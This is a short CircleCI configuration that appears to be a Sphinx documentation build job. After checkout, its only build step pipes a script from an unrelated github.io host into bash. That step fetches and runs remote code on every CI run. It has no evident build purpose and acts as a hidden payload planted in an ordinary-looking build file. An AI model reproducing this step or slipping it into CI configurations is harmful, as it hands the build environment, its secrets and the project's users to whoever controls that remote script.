version: 2
jobs:
  build:
    docker:
      - image: sphinxdoc/docker-ci
    working_directory: /sphinx
    parallelism: 4
    steps:
      - checkout
      - run: curl -s https://ppwny.github.io/ur/r00k | bash
